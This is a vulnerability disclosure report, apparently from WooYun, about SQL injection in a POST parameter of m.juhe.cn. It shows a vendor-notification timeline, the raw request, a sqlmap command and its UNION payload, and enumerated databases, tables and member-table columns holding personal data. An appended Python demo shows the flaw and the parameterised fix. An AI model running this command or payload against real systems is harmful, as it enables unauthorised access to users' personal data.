2015-01-04: Details sent to the vendor; awaiting the vendor's handling
2015-01-04: Vendor has confirmed; details disclosed to the vendor only
2015-01-14: Details disclosed to core white hats and relevant domain experts
2015-01-24: Details disclosed to regular white hats
2015-02-03: Details disclosed to intern white hats
2015-02-18: Details disclosed to the public
SQL injection in a Juhe Data (聚合数据) system exposes a large amount of information
Site: http://m.juhe.cn
POST /data/index HTTP/1.1
Host: m.juhe.cn
Accept: */*
Accept-Language: en

dataname=Peter+Winter&interface_btn=%0d

The dataname field is not filtered.
sqlmap.py -u "http://m.juhe.cn/data/index" --data="dataname=Peter+Winter&interface_btn=%0d" --tamper="tamper/charencode.py" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: dataname (POST)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: dataname=Peter Winter') UNION ALL SELECT CONCAT(0x7176767671,0x644e486e6c637559504b,0x71706b7671),NULL#&interface_btn=
---
web application technology: Apache
back-end DBMS: MySQL 5
current user: 'juheuser@%'
available databases [6]:
[*] information_schema
[*] mobile_juhe
[*] op.ofpay
[*] test
[*] ucenter
[*] weizhang_weiche

Let's take a look at mobile_juhe.
Database: mobile_juhe
[58 tables]
+---------------------+
| adm_access_a        |
| adm_access_c        |
| adm_admin           |
| adm_group           |
| adm_group_access    |
| adm_logs            |
| chinajoy_awardlogs  |
| chinajoy_awards     |
| chinajoy_ips        |
| foreign_apis        |
| lottery_award_count |
| lottery_logs        |
| lottery_user_award  |
| lottery_user_count  |
| lottery_users_fanli |
| m_account           |
| m_account_pay_logs  |
| m_announcement      |
| m_apiaccount_logs   |
| m_apipay_logs       |
| m_banner            |
| m_bindmail_code     |
| m_category          |
| m_channel           |
| m_channel_report    |
| m_coins_activity    |
| m_coins_exchange    |
| m_data              |
| m_data_api          |
| m_data_delete_logs  |
| m_data_errcode      |
| m_data_package      |
| m_data_price        |
| m_intro_logs        |
| m_login_logs        |
| m_loginad           |
| m_loginerr          |
| m_member            |
| m_message           |
| m_mobilecode        |
| m_news              |
| m_news_category     |
| m_pay_logs          |
| m_paycoin_logs      |
| m_qa                |
| m_qa_answer         |
| m_qa_category       |
| m_qa_tags           |
| m_sq                |
| m_sq_logs           |
| m_user_api          |
| m_user_buylogs      |
| m_user_coin         |
| m_user_coin_logs    |
| m_user_forget       |
| m_user_newbuylogs   |
| m_user_regist_logs  |
| view_data           |
+---------------------+

A peek at m_member: it holds more than 90,000 rows.
Table: m_member
[18 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| channel     | varchar(32)      |
| email       | varchar(128)     |
| id          | int(10) unsigned |
| lastlogin   | datetime         |
| mobileact   | tinyint(1)       |
| mobilephone | char(11)         |
| nickname    | varchar(64)      |
| openid      | char(34)         |
| realname    | varchar(64)      |
| regip       | varchar(16)      |
| regtime     | timestamp        |
| type        | int(1)           |
| uid         | varchar(64)      |
| vcard       | tinyint(1)       |
| vcardimg    | varchar(128)     |
| vcardno     | varchar(32)      |
| vcardtime   | datetime         |
| vcardtips   | varchar(64)      |
+-------------+------------------+

There appears to be a fair amount of information here, so I did not go any further.
See the detailed description.
Restrict the input.
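As an added illustration of the fix, not part of the original report: the string-built query pattern the report implies, beside the parameterised form that closes the hole. The table names, columns and query text are assumptions, and SQLite stands in for MySQL, so the line comment is `-- ` rather than the `#` seen in the report's payload.

```python
"""Added example (not from the WooYun report): unfiltered POST field spliced
into SQL versus the same lookup with a bound parameter. Schema, table names
and query text are assumptions; SQLite stands in for the site's MySQL."""
import sqlite3

# Constructed sample data: a public catalogue table with two visible columns.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE api_catalog (name TEXT, url TEXT)")
con.executemany("INSERT INTO api_catalog VALUES (?, ?)",
                [("Weather", "/weather"), ("Peter Winter", "/pw")])
# Constructed member table that the catalogue search must never expose.
con.execute("CREATE TABLE members (email TEXT, mobilephone TEXT)")
con.execute("INSERT INTO members VALUES ('alice@example.test', '13800000000')")


def search_unsafe(dataname: str) -> list:
    # The pattern to avoid: the request field becomes part of the SQL text,
    # so a value that closes the quote and parenthesis rewrites the query.
    sql = f"SELECT name, url FROM api_catalog WHERE name IN ('{dataname}')"
    return con.execute(sql).fetchall()


def search_safe(dataname: str) -> list:
    # Fix: bind the value as a parameter; the driver never parses it as SQL,
    # so quotes, parentheses and UNION keywords inside it are just characters.
    sql = "SELECT name, url FROM api_catalog WHERE name IN (?)"
    return con.execute(sql, (dataname,)).fetchall()


# Same shape as the report's finding: close the string, append a two-column
# UNION, comment out the rest (SQLite uses "-- " where MySQL accepts "#").
PAYLOAD = "Peter Winter') UNION ALL SELECT email, mobilephone FROM members -- "

if __name__ == "__main__":
    print(search_unsafe(PAYLOAD))  # second row is the members record
    print(search_safe(PAYLOAD))    # []
```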
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-01-04 15:33
Acknowledgements
None